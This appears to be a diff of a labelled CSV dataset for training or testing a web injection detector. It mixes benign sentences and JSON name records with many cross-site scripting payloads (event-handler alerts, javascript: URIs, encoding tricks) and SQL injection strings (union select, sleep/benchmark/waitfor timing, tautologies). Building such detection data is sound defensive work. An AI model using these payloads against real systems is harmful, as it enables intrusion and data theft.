few.",0,normal,25894 -any,0,normal,23182 -<basefont id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,4386 -Search records where relevant.,0,normal,23257 -<style>:target {color:red;}</style><dt id=x style=,1,XSS,6671 -1'+ ( select 'tmel' where 2655 = 2655 rlike ( sele,2,SQLi,21329 -"admin"" ) or ( ""1"" = ""1",2,SQLi,11482 -They could only be taken in Rome itself; and in ca,0,normal,25312 -( select * from ( select ( sleep ( 5 ) ) ) lrov ),2,SQLi,20579 -"While in Congress, Gowdy led the House Select Comm",0,normal,25133 -"{""id"":null,""name"":""Cloyster""}",0,normal,27555 -Select the ideal gift for someone special.,0,normal,24249 -1' ) as uwmy where 6980 = 6980,2,SQLi,16042 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8695 -waitfor delay '0:0:5' and ( '%' = ',2,SQLi,17766 -Where's the ski resort?,0,normal,23609 -"<input draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,5273 -"1"" ) ) as phis where 4420 = 4420 and 3202 = like (",2,SQLi,17658 -I want to select a new book to read.,0,normal,23750 -<command onpointerenter=alert(1)>XSS</command>,1,XSS,2575 -<style>:target {color:red;}</style><select id=x st,1,XSS,6501 -Select the suitable lighting for the room.,0,normal,24153 -or 'a'='a,2,SQLi,10006 -"<tt onmousedown=""alert(1)"">test</tt>",1,XSS,5862 -Select clear.,0,normal,24625 -"1"" ) where 4964 = 4964",2,SQLi,14522 -"-5207"" where 2050 = 2050 union all select 2050,205",2,SQLi,12492 -select pg_sleep ( 5 ) and ( ( ( 'mgbm' like 'mgbm,2,SQLi,15092 -"1' and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,19977 -1 ) ) as vzso where 8541 = 8541 or ( select 2* ( i,2,SQLi,18335 -"<style>@keyframes x{}</style><xss style=""animation",1,XSS,5 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,14304 -1 ) as tykp where 6851 = 6851,2,SQLi,15795 -""",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitf",2,SQLi,10916 --8187' ) ) ) or 1698 = 2823#,2,SQLi,15119 -<input id=x tabindex=1 onactivate=alert(1)></input,1,XSS,1866 -"<noembed onmouseout=""alert(1)"">test</noembed>",1,XSS,4090 -"-6550' ) where 1675 = 1675 union all select 1675,1",2,SQLi,18728 -<script>window['alert'](document['domain'])<script,1,XSS,9712 -Select the perfect angle for the shot.,0,normal,24200 -"1"" ) ) or 7417 = ( select count ( * ) from sysibm.",2,SQLi,20429 -perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\,1,XSS,1569 -1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||,2,SQLi,18725 -or 0 = 0 --,2,SQLi,11794 -"1"" and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ",2,SQLi,12476 -And so how do you select who purchases your home?,0,normal,26365 -"-3130' ) ) ) union all select 2886,2886,2886,2886,",2,SQLi,16488 -Merge the company logos.,0,normal,22623 -"1 ) where 3915 = 3915 union all select null,null,n",2,SQLi,20028 -A look at select films screening at the Sundance F,0,normal,26437 -"1%"" ) rlike sleep ( 5 ) #",2,SQLi,15332 -"1"" ) ) rlike ( select * from ( select ( sleep ( 5 ",2,SQLi,18591 -<body onorientationchange=alert(1)>,1,XSS,9081 -&#060,1,XSS,1065 -select ( case when ( 7163 = 1777 ) then 1 else 716,2,SQLi,19433 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) # ",2,SQLi,21153 -"-3068%"" ) ) union all select 6597,6597,6597,6597,6",2,SQLi,19117 -"<bdo onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,5309 --6388'+ ( select 'jqld' where 8600 = 8600 union al,2,SQLi,12655 -<ins id=x tabindex=1 ondeactivate=alert(1)></ins><,1,XSS,7334 -"<noscript onmousemove=""alert(1)"">test</noscript>",1,XSS,6107 -or '1'='1'--,2,SQLi,9964 +"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,13790 +"<acronym onbeforecut=""alert(1)"" contenteditable>te",1,XSS,7886 +1 ) as azoo where 8933 = 8933 and ( 3020 = 3020 ) ,2,SQLi,13927 +"<col onkeyup=""alert(1)"" contenteditable>test</col>",1,XSS,8435 +select pg_sleep ( 5 ) and '%' = ',2,SQLi,18798 +1' ) rlike ( select ( case when ( 9308 = 2540 ) th,2,SQLi,21393 +1 ) where 4866 = 4866,2,SQLi,20181 +"))) RLIKE SLEEP(5) AND (((1337""=""1337",2,SQLi,11236 +select case when 8975 = 2352 then 1 else null end-,2,SQLi,14302 +"<FRAME SRC=""javascript:alert('')",1,XSS,4471 +<data onpointerup=alert(1)>XSS</data>,1,XSS,3109 +"<blockquote onkeyup=""alert(1)"" contenteditable>tes",1,XSS,7928 +<bgsound id=x tabindex=1 ondeactivate=alert(1)></b,1,XSS,2008 +1 ) ) and sleep ( 5 ) #,2,SQLi,12893 +"-6442"" ) ) ) or 3038 = 3038",2,SQLi,16200 +select sleep ( 5 ) and ( ( 'srfc' like 'srfc,2,SQLi,13619 +"1%"" ) union all select null,null--",2,SQLi,21343 +"<data onclick=""alert(1)"">test</data>",1,XSS,8174 +"-5317' ) ) union all select 7673,7673,7673,7673,76",2,SQLi,17723 +<rt onpointermove=alert(1)>XSS</rt>,1,XSS,5967 +Select a board game for game night.,0,normal,24131 +"-9684"" order by 1#",2,SQLi,20133 +"1"" ) where 3958 = 3958 or 6979 = like ( 'abcdefg',",2,SQLi,20480 +1 where 4519 = 4519,2,SQLi,16936 +"<br onkeypress=""alert(1)"" contenteditable>test</br",1,XSS,4388 +Check values where necessary.,0,normal,23254 +<blink onfocusout=alert(1) tabindex=1 id=x></blink,1,XSS,6673 +1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 w,2,SQLi,17070 +"1 ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11484 +They have called for a special prosecutor or selec,0,normal,25309 +1' ) ) ) and 3707 = ( select count ( * ) from sysi,2,SQLi,20577 +"While some costs may be standard across the board,",0,normal,25130 +-7940' ) union all select 6024--,2,SQLi,12502 +1' where 1045 = 1045 or 6793 = ( select 6793 from ,2,SQLi,22431 +The BCBS Institute will test the pharmacy rides at,0,normal,25482 +"<data draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,8697 +Select a movie for our movie night.,0,normal,24203 +Where's the skate park?,0,normal,23606 +"<style>@keyframes slidein {}</style><rtc style=""an",1,XSS,5275 +Filter spam calls.,0,normal,22777 +Let's choose a location for our next meetup.,0,normal,23747 +"<embed onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,2576 +<blink id=x tabindex=1 onactivate=alert(1)></blink,1,XSS,6503 +The controller is even compatible with Windows PC ,0,normal,25467 +or a=a–,2,SQLi,10008 +"<style>@keyframes x{}</style><nav style=""animation",1,XSS,5864 +1 ) as qywz where 1864 = 1864 and 3715 in ( ( char,2,SQLi,16537 +"{""id"":null,""name"":""leg""}",0,normal,26750 +"-5624' union all select 3723,3723,3723,3723,3723--",2,SQLi,21170 +1' ) ) as usrk where 6324 = 6324 union all select ,2,SQLi,15084 +"1%"" ) ) and ( select * from ( select ( sleep ( 5 )",2,SQLi,19975 +Specify criteria where applicable.,0,normal,23353 +"<style>@keyframes x{}</style><xss style=""animation",1,XSS,5 +I want to select the right gift for my friend.,0,normal,23731 +-9809' order by 1--,2,SQLi,20071 +"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitf",2,SQLi,10918 +"-5062"" ) ) ) or ( 1069 = 8974 ) *8974 and ( ( ( ""h",2,SQLi,14449 +"<tr onpaste=""alert(1)"" contenteditable>test</tr>",1,XSS,1867 +"<style>@keyframes slidein {}</style><rb style=""ani",1,XSS,4092 +1' in boolean mode ) or 8514 = benchmark ( 5000000,2,SQLi,19953 +<script>window['alert'](0)</script>,1,XSS,9714 +( select ( case when ( 9525 = 9280 ) then 9525 els,2,SQLi,15849 +"First, keep in mind that there are other steps you",0,normal,26190 +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>,1,XSS,1570 +1 ) as rnfb where 2405 = 2405 or 8514 = benchmark ,2,SQLi,18723 +"select * from users where id = 1 or ""{,"" = 1 or 1 ",2,SQLi,11796 +"1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,21196 +-3578' ) ) ) order by 1--,2,SQLi,15367 +"1' and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,16486 +Select the best photo.,0,normal,22620 +-6488' or 5164 = 9234,2,SQLi,15721 +A proposal to create a select vestry in 1822 was e,0,normal,26434 +end and 'icny' like 'icny,2,SQLi,17342 +"1%"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ",2,SQLi,18589 +<body onscroll=alert(1)><br><br><br><br>,1,XSS,9083 +&#0060,1,XSS,1066 +"1 and 4241 = convert ( int, ( select char ( 113 ) ",2,SQLi,18486 +"1"" ) ) as jsdc where 2748 = 2748",2,SQLi,20704 +Once you select which bank account will receive yo,0,normal,25827 +"<sub oncontextmenu=""alert(1)"">test</sub>",1,XSS,5311 +1'|| ( select 'bpml' where 7360 = 7360 or extractv,2,SQLi,12648 +"<big oncopy=""alert(1)"" contenteditable>test</big>",1,XSS,7336 +<svg><hgroup onload=alert(1)></hgroup>,1,XSS,6109 +or '1'='1'#,2,SQLi,9966 "</script><img/*%00/src=""worksinchrome&colon;prompt",1,XSS,333 -<b onpointerdown=alert(1)>XSS</b>,1,XSS,3990 -Calculate sums where valid.,0,normal,23309 -1'|| ( select 'vsfg' where 3547 = 3547 and updatex,2,SQLi,14419 -"<option onclick=""alert(1)"">test</option>",1,XSS,3693 -<ol onpointerdown=alert(1)>XSS</ol>,1,XSS,6867 -"<applet oncontextmenu=""alert(1)"">test</applet>",1,XSS,7463 -1 ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ,2,SQLi,12832 -"1',iif ( 9496 = 4153,1,1/0 )",2,SQLi,18131 -"1"" ) ) as pxdp where 4575 = 4575 and elt ( 8258 = ",2,SQLi,15493 --8513' union all select 7414--,2,SQLi,12886 -"<xmp onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,7815 -"{""id"":null,""firstName"":""Liew"",""lastName"":""Woon"",""a",0,normal,27348 -"-8797"" ) ) order by 1#",2,SQLi,19650 -1 ) as wvpl where 9791 = 9791 and make_set ( 3491 ,2,SQLi,16711 -<xss id=x tabindex=1 onfocusin=alert(1)></xss>,1,XSS,6735 --6789'|| ( select 'uckz' from dual where 2163 = 21,2,SQLi,14859 -1' ) and 6414 = ( select count ( * ) from rdb$fiel,2,SQLi,21847 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,14284 -"{""id"":null,""firstName"":""Gnana"",""lastName"":""Kannan""",0,normal,27064 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10492 -"1%"" ) ) ) or 8315 = ( select count ( * ) from sysi",2,SQLi,22414 -"<figcaption onmouseenter=""alert(1)"">test</figcapti",1,XSS,4468 -Join the parade.,0,normal,22849 -"-7202%"" ) ) union all select 2901#",2,SQLi,20372 -[a](javascript:confirm(1),1,XSS,9431 -<image onpointerover=alert(1)>XSS</image>,1,XSS,5170 -"<kbd oncut=""alert(1)"" contenteditable>test</kbd>",1,XSS,7727 -"-1620 ) ) union all select 6257,6257,6257,6257,625",2,SQLi,14654 -<listing id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,7946 -<bdi onpointerup=alert(1)>XSS</bdi>,1,XSS,5632 -"<source oncopy=""alert(1)"" contenteditable>test</so",1,XSS,8733 -Select find.,0,normal,24596 -<th onblur=alert(1) tabindex=1 id=x></th><input au,1,XSS,7415 -"select * from users where id = 1 or ""@ ( "" or 1 = ",2,SQLi,11925 -"<area onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,8679 -<track onpointerdown=alert(1)>XSS</track>,1,XSS,8057 -"-1033 union all select 8731,8731,8731,8731,8731,87",2,SQLi,17708 -<;scrscriptipt>;alert(1)<;/scrscriptipt>;,1,XSS,1684 -"{""id"":null,""name"":""unknown tape""}",0,normal,27271 -<x%0Conxxx=1,1,XSS,9362 --3105' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ,2,SQLi,17296 -1 ) ) ) and 6467 = 1864#,2,SQLi,13317 +"<wbr onmouseleave=""alert(1)"">test</wbr>",1,XSS,3992 +"1', ( select ( case when ( 5141 = 5141 ) then ( as",2,SQLi,19988 +"1%"" ) ) ) procedure analyse ( extractvalue ( 9627,",2,SQLi,17598 +"<style>@keyframes slidein {}</style><font style=""a",1,XSS,3695 +<address onpointerup=alert(1)>XSS</address>,1,XSS,6869 +"<aside onmouseover=""alert(1)"">test</aside>",1,XSS,7465 +"-4876"" ) ) as saug where 2256 = 2256 union all sel",2,SQLi,20141 +"-2610%"" ) union all select 7779,7779,7779,7779,777",2,SQLi,14136 +"-2453"" ) union all select 4520,4520,4520,4520,4520",2,SQLi,15485 +"1 ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745",2,SQLi,15907 +<style>:target {color:red;}</style><video id=x sty,1,XSS,7817 +"{""id"":null,""firstName"":""Quek"",""lastName"":""Han Kok""",0,normal,27347 +Select the perfect lighting for the ambiance.,0,normal,24208 +select ( case when ( 5290 = 1720 ) then 5290 else ,2,SQLi,13992 +"<var ondblclick=""alert(1)"">test</var>",1,XSS,6737 +Select map.,0,normal,24656 +1' and 6240 = ( 'qqpjq'|| ( select case 6240 when ,2,SQLi,21845 +select ( case when ( 6859 = 6507 ) then 6859 else ,2,SQLi,22275 +"{""id"":null,""name"":""Aurochs""}",0,normal,27061 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10494 +1%' ) ) ) and char ( 120 ) ||char ( 106 ) ||char (,2,SQLi,22412 +"<datalist onkeypress=""alert(1)"" contenteditable>te",1,XSS,4470 +"1"" and 3715 in ( ( char ( 113 ) +char ( 113 ) +cha",2,SQLi,17969 +"1',iif ( 7475 = 7475,1,1/0 )",2,SQLi,20044 +[a](javascript://%0d%0aconfirm(1);com),1,XSS,9433 +<script> alert(asdal'') </script>,1,XSS,5172 +<wbr onpointerleave=alert(1)>XSS</wbr>,1,XSS,7729 +"1', ( begin if ( 8340 = 8340 ) then dbms_lock.slee",2,SQLi,14647 +"<element onmouseleave=""alert(1)"">test</element>",1,XSS,7948 +<image2 onpointerdown=alert(1)>XSS</image2>,1,XSS,5634 +<u onpointerdown=alert(1)>XSS</u>,1,XSS,8735 +Select upload.,0,normal,24593 +"<tbody onkeydown=""alert(1)"" contenteditable>test</",1,XSS,7417 +"select * from users where id = 1 or "" ( 1"" or 1 = ",2,SQLi,11927 +<svg><frameset onload=alert(1)></frameset>,1,XSS,8681 +<body id=x tabindex=1 ondeactivate=alert(1)></body,1,XSS,8059 +"1%' ) union all select null,null,null--",2,SQLi,14166 +"<;br size=\"";&;{alert(&#039;XSS&#039;)}\"";>;",1,XSS,1685 +"{""id"":null,""firstName"":""Agatha"",""lastName"":""Yeo Li",0,normal,27269 +<x%2Fonxxx=1,1,XSS,9364 +"1"" ) as zbhs where 2017 = 2017 or row ( 1045,7562 ",2,SQLi,17294 +"1' where 5801 = 5801 or row ( 1045,7562 ) > ( sele",2,SQLi,13310 `'><script>\xE2\x80\xA9javascript:alert(1)</script,1,XSS,579 -<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>,1,XSS,1111 -"1"" where 4294 = 4294 and make_set ( 2543 = 7988,79",2,SQLi,17844 -"1"" ) ) as xtlt where 9293 = 9293",2,SQLi,18837 --9953'|| ( select 'zljk' where 2886 = 2886 union a,2,SQLi,21288 -"{""id"":null,""name"":""Horsea""}",0,normal,26795 -"1%"" ) order by 1--",2,SQLi,17373 -1'+ ( select 'mxlb' where 4900 = 4900,2,SQLi,13769 -"<del onmousedown=""alert(1)"">test</del>",1,XSS,5724 -"1' in boolean mode ) or updatexml ( 1808,concat ( ",2,SQLi,13805 -1' ) as mwpp where 6192 = 6192,2,SQLi,14861 -"UNION ALL SELECT 1, @@version;#",2,SQLi,10023 -"<style>@keyframes x{}</style><style style=""animati",1,XSS,7251 +"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:&#101;x&#x",1,XSS,1112 +Select a quote for your daily inspiration.,0,normal,24060 +"1 ) where 9059 = 9059 and extractvalue ( 7982,conc",2,SQLi,18835 +"-4406%' union all select 9599,9599,9599,9599#",2,SQLi,18722 +where,0,normal,26523 +"Select the account you just added and press ""A"" on",0,normal,25601 +-9657' ) as ziiq where 7725 = 7725 or 3038 = 3038,2,SQLi,14134 +"<style>@keyframes x{}</style><ol style=""animation-",1,XSS,5726 +The following is a select list of genera of stove ,0,normal,25441 +"-3460%"" ) ) ) or 9323 = 9323#",2,SQLi,13727 +"UNION select table_schema,table_name FROM informat",2,SQLi,10025 +<svg><pre onload=alert(1)></pre>,1,XSS,7253 "<img[a][b][c]src[d]=x[e]onerror=[f]""alert(1)"">",1,XSS,677 -1%' ) ) waitfor delay '0:0:5'--,2,SQLi,19803 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7539 +1 where 6500 = 6500,2,SQLi,19801 +<strike onpointerenter=alert(1)>XSS</strike>,1,XSS,7541 "{""id"":null,""firstName"":""Khairuddin"",""lastName"":""Ad",0,normal,27371 -By this charter the burgesses acquired the right o,0,normal,26297 +1'|| ( select 'eayf' where 5431 = 5431 and char ( ,2,SQLi,15610 "<?xml version=""1.0""?><html:html xmlns:html='http:/",1,XSS,783 -Where's the circus?,0,normal,23589 -1' ) ) as ytfi where 3323 = 3323 and 8148 = like (,2,SQLi,13635 -"1"" ) or 8421 = ( select count ( * ) from generate_",2,SQLi,15118 -"or 1""=""1""/*",2,SQLi,9989 -"-8448%"" or 4747 = dbms_utility.sqlid_to_sqlhash ( ",2,SQLi,20068 -"1"" ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97",2,SQLi,12406 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10426 -select case when 3920 = 4402 then 1 else null end-,2,SQLi,13707 -1'+ ( select 'gmpn' where 8137 = 8137 or sleep ( 5,2,SQLi,17492 +select ( case when ( 1412 = 5313 ) then 1412 else ,2,SQLi,14021 +"1 ) where 6788 = 6788 union all select null,null,n",2,SQLi,13628 +"1"" ) where 8196 = 8196",2,SQLi,15110 +or 1=1 --,2,SQLi,9991 +-7126' ) ) as fzpp where 8078 = 8078 union all sel,2,SQLi,20066 +select ( case when ( 6615 = 3564 ) then 1 else 661,2,SQLi,12399 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10428 +1 ) as vqbf where 4020 = 4020,2,SQLi,14549 +"1 and elt ( 4249 = 4249,7259 )",2,SQLi,18526 <script>\u{0000000061}lert(1)</script>,1,XSS,184 -"javascript:/*""/*`/*'/*\""/*--></title></textarea></",1,XSS,9512 -<acronym id=x tabindex=1 onfocusin=alert(1)></acro,1,XSS,3167 -<input id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,4062 -"<var draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,2298 -"1"" ) ) as qode where 2398 = 2398 procedure analyse",2,SQLi,17605 -"-3933%"" ) ) or elt ( 8142 = 2978,2978 ) and ( ( ""%",2,SQLi,15698 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,14116 -"<basefont onmousemove=""alert(1)"">test</basefont>",1,XSS,2837 --4896' ) union all select 1929--,2,SQLi,19021 --5547' or 9323 = 9323#,2,SQLi,13236 -1 ) ) ) and 9198 = 9198--,2,SQLi,17218 -1 where 4641 = 4641,2,SQLi,12826 -<strong onfocusout=alert(1) tabindex=1 id=x></stro,1,XSS,1956 -"<image draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,2356 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,21212 -Where's the best pizza place?,0,normal,23493 --6766' ) ) ) or 3038 = 3038,2,SQLi,15840 -"<style>@keyframes slidein {}</style><body style=""a",1,XSS,7290 -Select your game.,0,normal,24923 -The hard-boiled and peeled eggs were sold in pails,0,normal,25434 -"<time onmouseout=""alert(1)"">test</time>",1,XSS,7121 -<svg><animatetransform onbegin=alert(1) attributeN,1,XSS,4563 +"javascript:""/*'/*\""/*` /**/alert()//--></title></t",1,XSS,9514 +<progress onpointerleave=alert(1)>XSS</progress>,1,XSS,3169 +<blockquote id=x tabindex=1 ondeactivate=alert(1)>,1,XSS,4064 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2299 +"1%"" and 3715 in ( ( char ( 113 ) +char ( 113 ) +ch",2,SQLi,21773 +"-2032%"" ) ) ) or ( 3082 = 7155 ) *7155 and ( ( ( """,2,SQLi,15946 +"-9751"" ) ) ) or 5929 = 3884--",2,SQLi,17800 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2838 +1'+ ( select 'asdq' where 4023 = 4023 and make_set,2,SQLi,19019 +"Destined originally for the Church, he had preferr",0,normal,26241 +"-5148"" ) ) or 5310 = 8229",2,SQLi,17216 +"While in Congress, Gowdy led the House Select Comm",0,normal,25133 +<details id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,1957 +<datalist onpointerenter=alert(1)>XSS</datalist>,1,XSS,2357 +"1"" ) ) as gbxx where 2459 = 2459 waitfor delay '0:",2,SQLi,21210 +"1%"" ) ) waitfor delay '0:0:5'--",2,SQLi,16922 +"1%"" ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457",2,SQLi,21095 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7292 +"{""id"":null,""firstName"":""Zhaodi"",""lastName"":""Chen"",",0,normal,27042 +The Hilton Honors Aspire Card comes with Priority ,0,normal,25431 +"<rtc draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,7123 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4565 "<a href=""\x1Bjavascript:javascript:alert(1)"" id=""f",1,XSS,534 -1' ) where 3730 = 3730 and sleep ( 5 ) #,2,SQLi,22124 -Select a painting style to experiment with.,0,normal,24237 -<hgroup onpointerup=alert(1)>XSS</hgroup>,1,XSS,8662 -"Go to your Facebook settings, then select ""Your Fa",0,normal,26136 -<body onbeforeprint=alert(1)>,1,XSS,4636 -<area id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,2743 -<style>:target {color: red;}</style><i id=x style=,1,XSS,6142 -"<style>@keyframes slidein {}</style><track style=""",1,XSS,3762 -1 ) ) ) and 2716 = ( select count ( * ) from sysus,2,SQLi,14327 +-7675%' ) ) ) order by 1--,2,SQLi,22122 +Select a fragrance for your home.,0,normal,24234 +"<img draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,8664 +Grab a picture from your camera roll (or click one,0,normal,26133 +<select onfocusout=alert(1) id=x></select><input a,1,XSS,4638 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2744 +"<html onkeypress=""alert(1)"" contenteditable>test</",1,XSS,6144 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3764 +"-6186' in boolean mode ) union all select 2990,299",2,SQLi,20624 "{""id"":null,""firstName"":""Chua"",""lastName"":""Wee Hao""",0,normal,27425 -"<style>@keyframes slidein {}</style><time style=""a",1,XSS,4735 -"select sleep ( 5 ) and ""%"" = """,2,SQLi,12740 -<li id=x tabindex=1 onactivate=alert(1)></li>,1,XSS,7444 -<img src=1 alt=al lang=ert onerror=top[alt+lang](0,1,XSS,9459 -Select the perfect attire for an event.,0,normal,24046 -The key is to select a name that is catchy and ins,0,normal,25421 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,13876 -"{""id"":null,""name"":""Vegiemon""}",0,normal,27518 -"-5591%"" ) ) order by 1--",2,SQLi,15413 -"<rt onmouseout=""alert(1)"">test</rt>",1,XSS,8046 -"1"" and 8407 = ( select count ( * ) from generate_s",2,SQLi,20553 -1 ) ) or sleep ( __TIME__ ) #,2,SQLi,11973 -Demonstrate the ability to select relevant princip,0,normal,26243 -"<dl draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,5761 -"In ' FrontPage Editor ', select the tab at the bot",0,normal,26031 -"<b oncopy=""alert(1)"" contenteditable>test</b>",1,XSS,8523 -<style onpointermove=alert(1)>XSS</style>,1,XSS,3993 -"1"" ) where 9861 = 9861",2,SQLi,12574 -1' ) where 3375 = 3375 or 8315 = ( select count ( ,2,SQLi,20979 -Select the best candidate for the role.,0,normal,24133 +<col onpointerleave=alert(1)>XSS</col>,1,XSS,4737 +-3088' or 6872 = 6872 and 'miwk' = 'miwk,2,SQLi,12733 +"<dfn onclick=""alert(1)"">test</dfn>",1,XSS,7446 +</title><script ~~~>confirm(1)</script ~~~>,1,XSS,9461 +"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,17086 +The lecturer registers with the site and then can ,0,normal,25418 +1' ) as ljpy where 8270 = 8270 or ( select 9173 fr,2,SQLi,22265 +It's best to go to retail outlets first to see the,0,normal,25943 +select ( case when ( 2716 = 8138 ) then 2716 else ,2,SQLi,12992 +"<template oncopy=""alert(1)"" contenteditable>test</",1,XSS,8048 +"{""id"":null,""firstName"":""Desmond"",""lastName"":""Tan"",",0,normal,27026 +select * from users where id = 1 *$ . union select,2,SQLi,11975 +Diane Black is a member of the Planned Parenthood ,0,normal,26240 +"<figure onkeydown=""alert(1)"" contenteditable>test<",1,XSS,5763 +1' ) where 2330 = 2330 and ( select * from ( selec,2,SQLi,17716 +"<optgroup onkeydown=""alert(1)"" contenteditable>tes",1,XSS,8525 +<thead onpointerout=alert(1)>XSS</thead>,1,XSS,3995 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,12567 +1 ) as cfnz where 6065 = 6065 union all select nul,2,SQLi,20977 +1'|| ( select 'xasp' from dual where 4025 = 4025 a,2,SQLi,17792 "{""id"":null,""firstName"":""Vincent"",""lastName"":""Yong""",0,normal,27579 -Select a fragrance for your space.,0,normal,24095 -&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&,1,XSS,1567 -"-5898"" ) ) as fycd where 7135 = 7135 or 1570 = con",2,SQLi,21723 -select case when 9848 = 2618 then 1 else null end-,2,SQLi,17036 -"<div id=""114""><x style=""background:url('x[a];color",1,XSS,9103 -<audio src=1 onerror=alert(1)>,1,XSS,1146 -<footer id=x tabindex=1 ondeactivate=alert(1)></fo,1,XSS,4515 -select hospitals will close.,0,normal,25624 -1' where 8099 = 8099,2,SQLi,14363 -ORDER BY 9--,2,SQLi,10251 --5500' ) order by 1--,2,SQLi,16297 -"1 and 3202 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,20985 -Some will wish to select 20 or 30 or 40 per cent o,0,normal,25530 -""") or sleep(__TIME__)=""",2,SQLi,10839 -Select Comfort – Select Comfort reported quarterly,0,normal,25637 -"<xml id=""X""><a><b><script>document.vulnerable=true",1,XSS,1545 -1'|| ( select 'aevx' from dual where 9999 = 9999,2,SQLi,18852 -1' ) as nvqk where 3917 = 3917 or 1022 = ( select ,2,SQLi,15277 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10797 -"<h1 onclick=""alert(1)"">test</h1>",1,XSS,4512 -"<marquee onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,5668 -"<h1 ondblclick=""alert(1)"">test</h1>",1,XSS,3178 -#ERROR!,2,SQLi,10992 -1 where 8095 = 8095,2,SQLi,15109 -"<style>@im\port'\ja\vasc\ript:alert(\""XSS\"")';</st",1,XSS,1282 -Select votes could use a blockchain-based mobile a,0,normal,25573 -"<dialog draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,8285 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6176 -Likely: 20 percent – 40 percent off select styles;,0,normal,25906 -<cite onblur=alert(1) tabindex=1 id=x></cite><inpu,1,XSS,2472 -select * from users where id = 1 +$+. or 1 = 1 -- ,2,SQLi,11459 -ORDER BY 22#,2,SQLi,10295 -"<img draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5588 -<button onRowInserted=javascript:alert(1)>,1,XSS,9661 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4467 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10467 -"<keygen onmousemove=""alert(1)"">test</keygen>",1,XSS,6374 -"1%"" waitfor delay '0:0:5'--",2,SQLi,19595 -Select your preferred song.,0,normal,24446 -"{""id"":null,""name"":""Blitzle""}",0,normal,27222 -1' ) ) as peeo where 5356 = 5356 and elt ( 4722 = ,2,SQLi,15316 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6321 +To check that the SQL transact statement really is,0,normal,25279 +perl -e &#039;print \&quot;&lt;IMG SRC=java\0scrip,1,XSS,1568 +"select * from generate_series ( 3341,3341,case whe",2,SQLi,21721 +1%' ) ) or ( select 2* ( if ( ( select * from ( se,2,SQLi,17034 +"<div id=""116""><div id=""x"">x</div>",1,XSS,9105 +";alert(String.fromCharCode(88,83,83))//';alert(Str",1,XSS,1147 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4517 +Select libraries in select markets will be allowed,0,normal,25621 +"1' ) union all select null,null,null,null,null,nul",2,SQLi,14356 +ORDER BY 11--,2,SQLi,10253 +1' ) ) ) ( select ( case when ( 5451 = 5451 ) then,2,SQLi,22456 +Fetch records where necessary.,0,normal,23290 +1 ) ) as jvoo where 5116 = 5116 or 4240 = ( select,2,SQLi,20841 +""";waitfor delay '0:0:__TIME__'--",2,SQLi,10841 +"Select Cortana, click the settings icon (third fro",0,normal,25634 +"<div datafld=""b"" dataformatas=""html"" 